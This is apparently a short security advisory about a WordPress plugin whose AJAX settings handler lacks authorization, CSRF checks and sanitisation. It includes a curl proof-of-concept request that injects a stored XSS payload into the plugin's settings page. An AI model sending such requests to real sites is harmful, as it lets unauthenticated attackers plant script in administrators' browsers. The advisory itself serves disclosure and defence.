The plugin does not have authorization and CSRF checks on a specific action handler, as well as does not sanitize its settings, which enables an unauthenticated attacker to inject malicious XSS payloads into the settings page of the plugin.
curl https://example.com/wp-admin/admin-ajax.php --data 'action=wcu-update-text&option=wcusage_field_orders&value="></input><script>alert("xss");</script><input'
The XSS will be triggered in the Settings page of the plugin (/wp-admin/admin.php?page=wcusage_settings)